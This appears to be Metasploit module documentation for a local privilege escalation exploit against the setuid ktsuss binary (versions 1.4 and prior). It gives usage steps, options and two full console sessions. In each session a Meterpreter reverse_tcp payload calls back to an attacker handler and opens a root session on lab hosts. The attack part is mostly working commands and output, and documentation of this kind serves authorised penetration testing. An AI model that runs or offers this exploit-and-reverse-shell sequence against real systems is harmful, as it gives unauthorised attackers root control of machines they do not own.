h00die
3.8 KiB
3.8 KiB
Description
This module attempts to gain root privileges by exploiting a vulnerability in ktsuss versions 1.4 and prior.
The ktsuss executable is setuid root and does not drop
privileges prior to executing user specified commands,
resulting in command execution with root privileges.
Vulnerable Application
This module has been tested successfully on:
- ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64)
- ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64)
Verification Steps
- Start
msfconsole - Get a session
use exploit/linux/local/ktsuss_suid_priv_escset SESSION [SESSION]checkrun- You should get a new root session
Options
KTSUSS_PATH
Path to ktsuss executable (default: /usr/bin/ktsuss)
WritableDir
A writable directory file system path. (default: /tmp)
Scenarios
ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64)
msf5 > use exploit/linux/local/ktsuss_suid_priv_esc
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > check
[+] /usr/bin/ktsuss is setuid
[*] uid=1001(test) gid=1001(test) euid=0(root) groups=1001(test)
[+] The target is vulnerable.
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[+] /usr/bin/ktsuss is setuid
[*] uid=1001(test) gid=1001(test) euid=0(root) groups=1001(test)
[*] Writing '/tmp/.lBanpIYpAJ60cwt' (389 bytes) ...
[*] Executing payload ...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 172.16.191.137
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.137:53060) at 2019-08-19 09:18:29 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 172.16.191.137
OS : Sparky 5.8 (Linux 4.19.0-5-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64)
msf5 > use exploit/linux/local/ktsuss_suid_priv_esc
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > check
[+] /usr/bin/ktsuss is setuid
[*] uid=1001(test) gid=1002(test) euid=0(root) groups=1002(test)
[+] The target is vulnerable.
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[+] /usr/bin/ktsuss is setuid
[*] uid=1001(test) gid=1002(test) euid=0(root) groups=1002(test)
[*] Writing '/tmp/.R0aTPpB8aHk' (389 bytes) ...
[*] Executing payload ...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 172.16.191.167
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.167:44534) at 2019-08-19 09:25:48 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 172.16.191.167
OS : Sparky 6 (Linux 4.19.0-5-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >